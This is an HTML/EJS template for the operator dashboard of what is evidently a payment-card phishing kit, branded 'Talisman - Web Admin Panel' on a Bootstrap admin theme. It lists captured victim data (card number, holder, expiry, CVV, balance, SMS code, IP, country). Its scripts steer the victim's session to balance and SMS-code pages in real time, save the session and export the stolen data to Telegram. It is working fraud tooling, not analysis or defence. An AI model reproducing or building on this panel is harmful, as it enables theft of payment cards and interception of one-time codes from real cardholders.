<!DOCTYPE html>
<html lang="en">

<head>
    <!-- Global site tag (gtag.js) - Google Analytics -->
    <script async src="https://www.googletagmanager.com/gtag/js?id=UA-90680653-2"></script>
    <script>
        window.dataLayer = window.dataLayer || [];

        function gtag() {
            dataLayer.push(arguments);
        }
        gtag('js', new Date());

        gtag('config', 'UA-90680653-2');
    </script>

    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Twitter -->
    <!-- <meta name="twitter:site" content="@bootstrapdash">
    <meta name="twitter:creator" content="@bootstrapdash">
    <meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:title" content="Azia">
    <meta name="twitter:description" content="Responsive Bootstrap 4 Dashboard Template">
    <meta name="twitter:image" content="https://www.bootstrapdash.com/azia/img/azia-social.png"> -->

    <!-- Facebook -->
    <!-- <meta property="og:url" content="https://www.bootstrapdash.com/azia">
    <meta property="og:title" content="Azia">
    <meta property="og:description" content="Responsive Bootstrap 4 Dashboard Template">

    <meta property="og:image" content="https://www.bootstrapdash.com/azia/img/azia-social.png">
    <meta property="og:image:secure_url" content="https://www.bootstrapdash.com/azia/img/azia-social.png">
    <meta property="og:image:type" content="image/png">
    <meta property="og:image:width" content="1200">
    <meta property="og:image:height" content="600"> -->

    <!-- Meta -->
    <meta name="description" content="Responsive Bootstrap 4 Dashboard Template">
    <meta name="author" content="BootstrapDash">

    <title>Talisman - Web Admin Panel</title>

    <!-- vendor css -->
    <link href="/lib/fontawesome-free/css/all.min.css" rel="stylesheet">
    <link href="/lib/ionicons/css/ionicons.min.css" rel="stylesheet">
    <link href="/lib/typicons.font/typicons.css" rel="stylesheet">

    <!-- azia CSS -->
    <link rel="stylesheet" href="/css/azia.css">

</head>

<body>

    <div class="az-header">
        <div class="container">
            <div class="az-header-left">
                <a href="/admin" class="az-logo"><span></span> Talisman</a>
                <a href="" id="azMenuShow" class="az-header-menu-icon d-lg-none"><span></span></a>
            </div><!-- az-header-left -->
            <div class="az-header-menu">
                <div class="az-header-menu-header">
                    <a href="/admin" class="az-logo"><span></span> azia</a>
                    <a href="" class="close">&times;</a>
                </div><!-- az-header-menu-header -->
            </div><!-- az-header-menu -->
            <div class="az-header-right">
                <div class="dropdown az-profile-menu">
                    <a href="" class="az-img-user"><img src="/img/faces/face1.jpg" alt=""></a>
                    <div class="dropdown-menu">
                        <div class="az-dropdown-header d-sm-none">
                            <a href="" class="az-header-arrow"><i class="icon ion-md-arrow-back"></i></a>
                        </div>
                        <div class="az-header-profile">
                            <div class="az-img-user">
                                <img src="/img/faces/face1.jpg" alt="">
                            </div><!-- az-img-user -->
                            <h6>Administrator</h6>
                        </div><!-- az-header-profile -->

                        <a href="/admin/logout" class="dropdown-item"><i class="typcn typcn-power-outline"></i> Sign
                            Out</a>
                    </div><!-- dropdown-menu -->
                </div>
            </div><!-- az-header-right -->
        </div><!-- container -->
    </div><!-- az-header -->

    <div class="az-content pd-y-20 pd-lg-y-30 pd-xl-y-40">
        <div class="container">
            <div class="az-content-left az-content-left-components">
                <div class="component-item">
                    <label>Dashboard</label>
                    <nav class="nav flex-column">
                        <a href="/admin" class="nav-link">Sessions</a>
                        <a href="/admin/logs" class="nav-link">Logs</a>
                    </nav>
                    <label>Settings</label>
                    <nav class="nav flex-column">
                        <a href="/admin/orders" class="nav-link">Orders</a>
                        <a href="/admin/create-order" class="nav-link">Create order</a>
                    </nav>
                </div><!-- component-item -->

            </div><!-- az-content-left -->
            <div class="az-content-body pd-lg-l-40 d-flex flex-column">

                <div class="az-content-label mg-b-5">Session - #<%= session.session.uniqueID %>
                </div>
                <p class="mg-b-20">Session details</p>

                <div class="table-responsive">
                    <table class="table table-hover mg-b-0">
                        <thead>
                            <tr>
                                <th>Unique ID</th>
                                <th>Country</th>
                                <th>IP Address</th>
                                <th>Status</th>
                            </tr>
                        </thead>
                        <tbody>
                            <tr>
                                <th scope="row">
                                    <%= session.session.uniqueID %>
                                </th>
                                <td>
                                    <%= session.session.country %>
                                </td>
                                <td>
                                    <%= session.session.ip %>
                                </td>
                                <td>
                                    <% if (session.session.status===true) { %>Online<% } else { %>Offline<% } %>
                                </td>
                            </tr>
                        </tbody>
                    </table>

                    <table class="table table-hover mg-b-0" style="margin-top: 2rem;">
                        <thead>
                            <tr>
                                <th>Card Number</th>
                                <th>Card Holder</th>
                                <th>Expiry Date</th>
                                <th>CVV Number</th>
                            </tr>
                        </thead>
                        <tbody>
                            <tr>
                                <th scope="row">
                                    <%= session.session.cardNumber %>
                                </th>
                                <td>
                                    <%= session.session.cardHolder %>
                                </td>
                                <td>
                                    <%= session.session.expiryDate %>
                                </td>
                                <td>
                                    <%= session.session.cvvNumber %>
                                </td>
                            </tr>
                        </tbody>
                    </table>

                    <table class="table table-hover mg-b-0" style="margin-top: 2rem;">
                        <thead>
                            <tr>
                                <th>Card Balance</th>
                                <th>SMS Code</th>
                                <th>Page</th>
                            </tr>
                        </thead>
                        <tbody>
                            <tr>
                                <th scope="row">
                                    <%= session.session.cardBalance %>
                                </th>
                                <td>
                                    <%= session.session.smsCode %>
                                </td>
                                <td>
                                    <%= session.session.page %>
                                </td>
                            </tr>
                        </tbody>
                    </table>
                </div><!-- table-responsive -->
                <div class="row row-xs wd-xl-80p" style="margin-top: 4rem;">
                    <div class="col-sm-6 col-md-3"><button id="balance-button"
                            class="btn btn-az-primary btn-block">Balance
                            Page</button></div>
                    <div class="col-sm-6 col-md-3 mg-t-10 mg-sm-t-0"><button id="sms-button"
                            class="btn btn-az-secondary btn-block">SMS
                            Page</button></div>
                    <div class="col-sm-6 col-md-3 mg-t-10 mg-md-t-0"><button class="btn btn-success btn-block"
                            id="finish-button">Save &
                            Finish</button></div>
                    <div class="col-sm-6 col-md-3 mg-t-10 mg-md-t-0"><button class="btn btn-info btn-block"
                            id="export-button">Export</button></div>
                </div>
                <div class="ht-40"></div>

                <div class="az-footer mg-t-auto">
                    <div class="container">
                        <span class="text-muted d-block text-center text-sm-left d-sm-inline-block">Copyright ©
                            bootstrapdash.com
                            2020</span>
                        <span class="float-none float-sm-right d-block mt-1 mt-sm-0 text-center"> Free <a
                                href="https://www.bootstrapdash.com/bootstrap-admin-template/" target="_blank">Bootstrap
                                admin
                                templates</a> from Bootstrapdash.com</span>
                    </div><!-- container -->
                </div><!-- az-footer -->
            </div><!-- az-content-body -->
        </div><!-- container -->
    </div><!-- az-content -->


    <script src="/lib/jquery/jquery.min.js"></script>
    <script src="/lib/bootstrap/js/bootstrap.bundle.min.js"></script>
    <script src="/lib/ionicons/ionicons.js"></script>
    <script src="/js/jquery.cookie.js" type="text/javascript"></script>

    <script src="/js/azia.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/socket.io/4.3.2/socket.io.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
    <input type="hidden" id="vcId" value="<%= uniqueID %>">

    <script>
        const socket = io();
        const vcId = document.getElementById('vcId').value
        function refreshPage() {
            location.reload();
        }

        // Set the timeout to refresh the page after 10 seconds (10000 milliseconds)
        setTimeout(refreshPage, 10000);

        document.getElementById('balance-button').addEventListener('click', () => {
            axios.post('/admin/api/getUrl', {
                url: '/cbal',
                vcId: vcId
            })
                .then(function (response) {
                    console.log(response);
                })
                .catch(function (error) {
                    console.log(error);
                });
        })

        document.getElementById('sms-button').addEventListener('click', () => {
            axios.post('/admin/api/getUrl', {
                url: '/sc-cnrm',
                vcId: vcId
            })
                .then(function (response) {
                    console.log(response);
                })
                .catch(function (error) {
                    console.log(error);
                });
        })



        document.getElementById('finish-button').addEventListener('click', () => {
            axios.post('/admin/api/saveSession', {
                vcId: vcId
            })
                .then(function (response) {
                    console.log(response);
                })
                .catch(function (error) {
                    console.log(error);
                });

            axios.post('/admin/api/getUrl', {
                url: `/completed/`,
                vcId: vcId
            })
                .then(function (response) {
                    console.log(response);
                })
                .catch(function (error) {
                    console.log(error);
                });
        })

        document.getElementById('export-button').addEventListener('click', () => {
            axios.post('/admin/api/exportTelegram', {
                vcId: vcId
            })
                .then(function (response) {
                    console.log(response);
                })
                .catch(function (error) {
                    console.log(error);
                });
        })
    </script>
</body>

</html>